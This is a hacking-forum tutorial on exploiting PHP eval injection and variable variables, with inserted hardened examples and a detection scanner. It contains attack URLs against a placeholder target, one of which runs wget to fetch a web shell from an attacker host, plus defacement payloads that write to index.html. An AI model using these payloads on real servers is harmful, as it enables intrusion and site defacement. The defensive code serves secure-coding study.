Friday, 17 May 2013

How to exploit Dynamic Evaluation Variables in PHP applications.

Today I will be explaining how to exploit dynamic evaluation variables in PHP applications. PHP runs a huge share of the web, including the most popular CMS software such as WordPress, MyBB and Joomla. Exploiting a dynamic evaluation variable can lead to what is known as RCE (Remote Code Execution), which allows execution of arbitrary code or arbitrary functions, or even read/write access to arbitrary internal variables on the server. This class of bug is also a common source of 0days in software and applications. An example of this would be the RCE I found in an uploading software named SPAW. You can view my threads and see what was possible with this 0day in under an hour.

Quick note: these types of vulnerabilities are not unique to PHP; other interpreted languages have similar issues. For example, Python, Perl and JavaScript all have eval functions too.

[0x2]: Eval Injection (Simple):

[*] An eval injection vulnerability, also known as RCE, occurs when an attacker can control all or part of an input string that is fed into an eval() function call. This was what I used to exploit the SPAW software, using a JavaScript eval() call that was executing an unsanitized variable. The eval() function executes its argument as code on the server, and that is how a remote code execution attack happens.

Example:
Code:
$common_variable = "command";
$x = $_GET['arg'];
eval("\$common_variable = \"$x\";");

[*] Analysis:
As you can see, $x is never sanitized. The second line takes user input straight from $_GET, and the third line pastes that value into the string that eval() parses as PHP code. So an attacker only has to close the double quote and append his own statements; everything after the closing quote is executed as code. Here is a simpler example and how you would go about exploiting it on a remote server.

[*] Example:
Say a server is running a script and you were able to gain access to the file using LFI with the php://filter wrapper to read the source code, and you discovered an eval() call like this:

Code:
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>

* Well, to exploit this you would go to the script path in the URL and set the "cmd" parameter. eval() expects PHP code, not a shell command, so the command has to be wrapped in something like system():

Code:
http://www.target.com/php-files/input.php?cmd=system('wget www.mysite.com/shell.php');

* The above request makes eval() run system(), which executes wget and downloads my shell from our remote server (the quotes, spaces and semicolon need to be URL-encoded when you actually send it). That's a simple example of eval injection, just to help you grasp what's going on.
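The break-out described in the analysis above, as an added example that is not part of the original post: the interpolated eval() from [0x2], the quote break-out an attacker sends, and a version of the same script that does not need eval at all. The variable names $common_variable and $x follow the post; $_GET is replaced by a plain array so it runs from the command line (php eval_demo.php). A harmless marker variable stands in for a real payload such as system().

```php
<?php
// Added example (not from the original post). Demonstrates eval injection
// through string interpolation and a hardened version without eval().

function vulnerable(array $get): array {
    $x = $get['arg'] ?? '';
    $pwned = false;
    // The request value is pasted into the source text that eval() parses.
    eval("\$common_variable = \"$x\";");
    return ['common_variable' => $common_variable, 'pwned' => $pwned];
}

function hardened(array $get): array {
    $x = $get['arg'] ?? '';
    // No eval at all: a plain assignment does what the eval was meant to do.
    $common_variable = $x;
    // If the value must be one of a few commands, check it against a fixed list
    // (the list itself is an assumption for this example).
    $allowed = ['status', 'reload'];
    if (!in_array($common_variable, $allowed, true)) {
        $common_variable = 'status';
    }
    return ['common_variable' => $common_variable];
}

// Benign input behaves the same in both versions.
var_dump(vulnerable(['arg' => 'status']));   // pwned => false

// Closing the double quote lets the attacker append statements; the trailing "//"
// comments out the rest of the original string so the eval'd code still parses.
// eval() ends up running:  $common_variable = ""; $pwned = true; //";
$payload = '"; $pwned = true; //';
var_dump(vulnerable(['arg' => $payload]));   // pwned => true: the attacker's statement ran

var_dump(hardened(['arg' => $payload]));     // falls back to 'status'; nothing is executed
```

The same break-out works whenever user input lands inside a quoted string that eval() parses; the only thing that changes is which quote character you have to close.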

[0x3]: Dynamic Variable Evaluation:

[*] Okay, so many hackers/programmers love PHP. It's a simple but powerful language that comes with a lot of heart-warming and life-saving functions. Those same functions can also be the cause of all your hard work being destroyed in a matter of seconds after publishing your site to the web. PHP supports "variable variables": variables or expressions that evaluate to the names of other variables. Just think about that and tell me it doesn't spell trouble. These expressions can be used to dynamically change which variable is accessed or set while the program runs. It sounds convenient, but if the variable name comes from the user and is not checked, an attacker can read or write arbitrary variables in the script. On its own that is variable overwrite; it turns into remote code execution when one of the overwritten variables later reaches eval(), include() or a system call.

[*] Example:

Code:
$varname = "myvar";
$$varname = 10;
echo $myvar;

[*] Analysis:

This sets $myvar and prints 10. Let's put this into a real-world situation:

[*] Real World Situation:
Code:
$safevar = "Welcome to my site";
$param1 = "";
$param2 = "";
$param3 = "";
# my own "register globals" for param[1,2,3]
foreach ($_GET as $key => $value) {
$$key = $value;
echo $value;
}

[*] Analysis:
The loop turns every GET parameter into a variable with the parameter's name, so the attacker controls the name as well as the value. As written the script only echoes each value back, so the interesting effect is that he can overwrite variables the author never meant to expose, like $safevar. Setting $safevar to "echo Hacked By Legit >> /home/var/www/public_html/index.html" looks like this:

Code:
http://www.target.com/php-files/input.php?safevar=echo Hacked By Legit >> /home/var/www/public_html/index.html

* That alone only replaces the welcome string; a shell command sitting in a variable does nothing by itself. It becomes RCE the moment the overwritten variable is handed to eval(), system() or a similar function. If "echo $value" were eval($value) instead, exploitation would work the same way: put your PHP, for example system('echo Hacked By Legit >> /home/var/www/public_html/index.html');, in the URL as the value of any parameter, $safevar included.
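The overwrite described above, as an added example that is not part of the original post: the "my own register globals" loop from the real-world situation, run against a constructed query string, beside a version that only accepts the parameters it declared. Variable names ($safevar, $param1..$param3) follow the post; the request is built with parse_str() so the script runs offline (php varvar_demo.php).

```php
<?php
// Added example (not the post's code). Variable-variable overwrite via a
// register-globals style loop, and an allowlist that prevents it.

function handle_vulnerable(array $get): array {
    $safevar = "Welcome to my site";
    $param1 = ""; $param2 = ""; $param3 = "";
    foreach ($get as $key => $value) {
        $$key = $value;            // any request key becomes a local variable name
    }
    return compact('safevar', 'param1', 'param2', 'param3');
}

function handle_hardened(array $get): array {
    $safevar = "Welcome to my site";
    $params = ['param1' => '', 'param2' => '', 'param3' => ''];
    // Only the keys we declared are ever touched; the attacker cannot name a variable.
    foreach (array_keys($params) as $name) {
        if (isset($get[$name])) {
            $params[$name] = (string) $get[$name];
        }
    }
    return ['safevar' => $safevar] + $params;
}

// Constructed request: one expected parameter plus an attacker-chosen key that
// collides with an internal variable.
parse_str('param1=x&safevar=Hacked+By+Legit', $get);

var_dump(handle_vulnerable($get)['safevar']);   // "Hacked By Legit": internal variable overwritten
var_dump(handle_hardened($get)['safevar']);     // "Welcome to my site": unaffected
```

extract($_GET) has exactly the same problem as the loop; if you must use it, extract($_GET, EXTR_SKIP) at least refuses to overwrite variables that already exist, but an explicit list of expected names is the safer fix.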

[*] How to Detect Dynamic Variable Evaluation:

To detect these in source code you can use your favourite text editor's find function; personally I use grep. Either way, you would search for:

Detection Examples:

$$varname

${$varname}

${$var . $name}

${arbitrary expression}

* Search for common expression such as $$ and ${ or ${$ .

[0x4]: Dynamic Function Evaluation:

[*] Just like dynamic variable evaluation, dynamic function evaluation revolves around "variable variables" that can be used to dynamically reference functions.

[*] Example:

Code:
<?php
function myfunction($a, $b) { echo "$a $b"; }
$function_name = "myfunction";   # the string decides which function gets called
$Arg1 = "hello";
$Arg2 = "welcome to my site";
$function_name($Arg1, $Arg2);    # variable function call: effectively myfunction("hello", "welcome to my site")
?>

[*] Analysis:
This is just like exploiting dynamic variable evaluation, except this time the string in $function_name decides which function gets called and the arguments are passed straight through, so when you exploit it you may have to rewrite the arguments in your URL so the whole call still makes sense. The code above effectively calls myfunction("hello", "welcome to my site") and prints "hello welcome to my site".

[*] Exploitation:

Code:
<?php
function myfunction($a, $b) { eval($a . " " . $b); }   # joins both arguments and runs the result as PHP
$function_name = "myfunction";
$Arg1 = "echo 'hello';";
$Arg2 = "echo 'welcome to my site';";
# same "register globals" loop as in [0x3]: any URL parameter overwrites these
foreach ($_GET as $key => $value) { $$key = $value; }
$function_name($Arg1, $Arg2);
?>

Code:
http://www.target.com/php-files/input.php?Arg1=echo 'hello';&Arg2=system("echo Hacked By Legit >> /home/var/www/public_html/index.html");

Code:
http://www.target.com/php-files/input.php?Arg1=&Arg2=system("echo Hacked By Legit >> /home/var/www/public_html/index.html");

Code:
http://www.target.com/php-files/input.php?Arg1=%3B&Arg2=system("echo Hacked By Legit >> /home/var/www/public_html/index.html");

* Exploiting this means you know $function_name is going to run not one argument but two, joined together. If we only put our command in $Arg1, $Arg2 would still be appended and could break the code or give messy output, and the same goes the other way round. So in order to execute our command we have to make the whole joined string parse as valid PHP (and URL-encode the quotes, spaces and semicolons when sending it).

* In the first example, since the original argument just echoes a single word, we let it echo hello into our output and discard it when reviewing the data. I wouldn't advise this if the function were more complex.

* In the second example we leave $Arg1 empty so that only the second argument ($Arg2) is executed. This is sketchy sometimes; it only works if the function tolerates an empty first argument, so I wouldn't really recommend it either.

* The third example is very solid and what I go with just about every time. We use ; to close the statement, just like every line of code ends in ; to finish that statement before the next one starts. By using Arg1=%3B (a URL-encoded semicolon) the first slot becomes an empty statement that executes nothing, and our command in $Arg2 runs cleanly after it.
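The variable function call from [0x4], as an added example that is not part of the original post. It goes one step beyond the post's scenario: here the function name itself comes from the request, which is how variable function calls are usually reached in real applications (action dispatchers), rather than only the arguments. The handler names show_page and list_files and the "action"/"arg" parameters are assumptions for this example; $_GET is replaced by a plain array so it runs offline (php dynfunc_demo.php).

```php
<?php
// Added example (not the post's code). A request-controlled variable function
// call beside a dispatcher that maps request values to a fixed set of handlers.

function show_page(string $arg): string { return "page: $arg"; }
function list_files(string $arg): string { return "listing: $arg"; }

function dispatch_vulnerable(array $get): string {
    $action = $get['action'] ?? 'show_page';
    $arg    = $get['arg'] ?? '';
    // Variable function: whatever string arrives in "action" is called as a function.
    return (string) $action($arg);
}

function dispatch_hardened(array $get): string {
    $handlers = ['show' => 'show_page', 'list' => 'list_files'];   // fixed map, assumed for the example
    $action = $get['action'] ?? 'show';
    if (!isset($handlers[$action])) {
        return 'unknown action';
    }
    $fn = $handlers[$action];            // the function name never comes from the request
    return $fn((string) ($get['arg'] ?? ''));
}

// Normal use.
echo dispatch_vulnerable(['action' => 'show_page', 'arg' => 'home']), "\n";   // page: home

// Attack: name any built-in. strrev is used as a harmless stand-in for
// system/shell_exec/passthru; the mechanism is identical.
echo dispatch_vulnerable(['action' => 'strrev', 'arg' => 'dlrow olleh']), "\n"; // hello world

// The hardened dispatcher refuses names outside its map.
echo dispatch_hardened(['action' => 'strrev', 'arg' => 'x']), "\n";             // unknown action
echo dispatch_hardened(['action' => 'list', 'arg' => '/tmp']), "\n";            // listing: /tmp
```

Checking the request value with function_exists() or is_callable() is not a fix: system is a perfectly callable function. The allowlist has to be a map from request tokens to handlers you chose.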

[*] How to Detect Dynamic Function Evaluation:

Detection Examples:

$$fname();

${$var1 . $var2} ("arg");

${"varname"} ();

* Search for commonly used expressions like $$ and ${ or ${" .
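A small grep-style scanner for the patterns listed in the two detection sections ([0x3] "How to Detect Dynamic Variable Evaluation" and the list just above), as an added example that is not part of the original post. It runs over a constructed sample of PHP source embedded in the script; the regexes and the sample are assumptions for the example, and the scanner is a heuristic, not a parser, so expect some false positives on lines like if ($x ($y)).

```php
<?php
// Added example (not the post's code). Line-oriented scan for variable
// variables, braced variable expressions, variable function calls and eval.

function scan_source(string $src): array {
    $patterns = [
        'variable variable' => '/\$\$[A-Za-z_]\w*/',          // $$varname
        'braced variable'   => '/\$\{[^}]*\}/',               // ${$var . $name}, ${"varname"}, ${expr}
        'variable function' => '/\$[A-Za-z_]\w*\s*\(/',       // $fname(...)
        'eval'              => '/\beval\s*\(/',
        'extract/parse_str' => '/\b(extract|parse_str)\s*\(/',  // register-globals style helpers
    ];
    $hits = [];
    foreach (explode("\n", $src) as $n => $line) {
        foreach ($patterns as $label => $re) {
            if (preg_match($re, $line)) {
                $hits[] = ['line' => $n + 1, 'type' => $label, 'code' => trim($line)];
            }
        }
    }
    return $hits;
}

// Constructed sample source (not from any real project).
$sample = <<<'PHP'
$varname = "myvar";
$$varname = 10;
${$var . $name} = 1;
$fname = "myfunction";
$fname("arg");
$x = ${"varname"}();
$safe = htmlspecialchars($_GET['q']);
PHP;

// Expected: hits on lines 2, 3, 5 and 6; nothing on lines 1, 4 and 7.
foreach (scan_source($sample) as $h) {
    printf("%3d  %-18s %s\n", $h['line'], $h['type'], $h['code']);
}
```

To run it over a real tree, feed file_get_contents() of each .php file to scan_source(); the same five regexes can be dropped straight into grep -nE if you prefer the shell.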

[0x5] Conclusion:

[*] Well, that's about all there is to exploiting dynamic evaluation in PHP and other scripting-language applications. I hope to clean this section up more and provide more in-depth tutorials for CHF. This section is in need of great knowledge, and I don't mean that you have SQLi and XSS down. The section is lacking in learning; very few have the will to explore new things and test their skills and knowledge. If anyone else is with me and thinks the same, please help me and rynaldo and others clean up this section and push the hackers of CHF to learn new things. If we do this, we will draw more attention to CHF, and more members will come if other hackers see the knowledge and greatness coming from our forum. I worked a good bit on this to perfect it and give examples, so please don't junk this or let it have 0 replies and 80 views. That's just pathetic, to let someone's hard work be trashed like that. So give me a like, shoutout, thank you, send me questions about the topic, anything. Just as long as you learn something new.
